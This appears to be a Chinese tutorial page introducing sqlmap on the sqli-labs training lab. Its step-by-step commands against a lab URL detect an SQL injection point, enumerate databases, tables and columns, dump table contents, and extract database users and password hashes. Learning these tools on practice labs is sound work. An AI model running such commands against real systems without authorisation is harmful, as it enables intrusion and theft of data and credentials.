脚本之家 服务器常用软件
快捷导航
您的位置:首页数据库MsSql → sqlmap入门

SQL注入之sqlmap入门学习

 更新时间:2023年05月10日 10:36:41   作者:菜鸟小权权  
本文主要介绍了SQL注入之sqlmap入门学习,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们下面随着小编来一起学习学习吧

原来sql注入如此简单

以SQL注入靶场sqli-labs第一关为例,进行sqlmap工具的使用分享。

一、判断是否存在注入点

使用命令:

使用命令:sqlmap -u "http://49.232.78.252:83/Less-1/?id=1"

有图中白色背景的 则判断出有注入点

二、查询当前用户下所有数据库

使用命令:

sqlmap -u "http://49.232.78.252:83/Less-1/?id=1" --dbs

可以看到有五个表

三、获取数据库中的表名

选取一个challenges数据库,获取此库的表名

使用命令:

sqlmap -u "http://49.232.78.252:83/Less-1/?id=1" -D challenges --tables

四、获取表中的字段名

选取表T5M0QG6FM2,获取其中字段名

使用命令:

sqlmap -u "http://49.232.78.252:83/Less-1/?id=1" -D challenges -T T5M0QG6FM2 –columns

五、获取字段内容

使用命令:

sqlmap -u "http://49.232.78.252:83/Less-1/?id=1" -D challenges -T T5M0QG6FM2 --columns –dump

六、获取数据库的所有用户

使用命令:

sqlmap -u "http://49.232.78.252:83/Less-1/?id=1" –users

使用该命令就可以列出所有管理用户

七、获取数据库用户的密码

使用命令:

sqlmap -u "http://49.232.78.252:83/Less-1/?id=1" –passwords

八、获取当前网站数据库的名称

使用命令:

sqlmap -u "http://49.232.78.252:83/Less-1/?id=1" --current-db

可以看到当前的数据库是 security

九、获取当前网站数据库的用户名称

使用命令:

sqlmap -u "http://49.232.78.252:83/Less-1/?id=1" --current-user

当前用户是root

到此这篇关于SQL注入之sqlmap入门学习的文章就介绍到这了,更多相关sqlmap入门内容请搜索脚本之家以前的文章或继续浏览下面的相关文章希望大家以后多多支持脚本之家!

您可能感兴趣的文章:

相关文章

  • SQL_Server全文索引的使用实例演示

    SQL_Server全文索引的使用实例演示

    开启SQL全文搜索提升查询性能,本文示范如何使用SQL全文索引的方法。需要的朋友可以参考下
    2013-07-07
  • 一文详解如何远程连接SQLServer数据库

    一文详解如何远程连接SQLServer数据库

    sql server是一款数据库管理工具,其中有非常多实用的功能可以帮助用户完成数据库的管理操作,也有一些用户在操作这款软件的时候会需要用到远程连接功能,这篇文章主要给大家介绍了关于如何远程连接SQLServer数据库的相关资料,需要的朋友可以参考下
    2023-10-10
  • SQLSERVER聚集索引和主键(Primary Key)的误区认识

    SQLSERVER聚集索引和主键(Primary Key)的误区认识

    很多人会把Primary Key和聚集索引搞混起来,或者认为这是同一个东西。这个概念是非常错误的,本文将带你理清思路,感兴趣的你可不要错过了哈,或许本文对你有所帮助
    2013-02-02
  • SQL SERVER 2012新增函数之逻辑函数IIF

    SQL SERVER 2012新增函数之逻辑函数IIF

    这篇文章主要介绍了关于SQL SERVER 2012新增函数之逻辑函数IIF的相关资料,网上关于逻辑函数IIF的资料比较少,本文中的介绍的还是相对详细的,需要的朋友可以参考借鉴,下面来一起看看吧。
    2017-03-03
  • SQL Server日志过大会影响查询结果

    SQL Server日志过大会影响查询结果

    一台老Web服务器上,使用的是ASP+SQL Server 2000的网站,五六年了,使用起来一直很顺畅,也就没有怎么去理它。
    2009-05-05
  • 访问和更改关系数据,使用MSSQL外联接

    访问和更改关系数据,使用MSSQL外联接

    访问和更改关系数据,使用MSSQL外联接...
    2007-02-02
  • SQL Server定期收缩日志文件的详细步骤

    SQL Server定期收缩日志文件的详细步骤

    事务日志记录着在相关数据库上的操作,同时还存储数据库恢复(recovery)的相关信息,收缩日志的原因有很多种,有些是考虑空间不足,有些则是应用程序限制导致的,本文将给大家介绍SQL Server定期收缩日志文件的详细步骤,需要的朋友可以参考下
    2024-06-06
  • SqlServer参数化查询之where in和like实现详解

    SqlServer参数化查询之where in和like实现详解

    若有一天你不可避免的需要提高SQL的查询性能,需要一次性where in 几百、上千、甚至上万条数据时,参数化查询将是必然进行的选择
    2012-05-05
  • SQL SERVER 开启CDC 实操详细

    SQL SERVER 开启CDC 实操详细

    这篇文章主要个代价介绍SQL SERVER CDC开启实操详细内容,文明芝麻官内容有详细代码及解说,需要的小伙伴可以参考一下
    2021-10-10
  • MySql 安装时的1045错误

    MySql 安装时的1045错误

    MySql安装到最后一步的时候,出现1045的错误有两种解决办法。
    2009-07-07

最新评论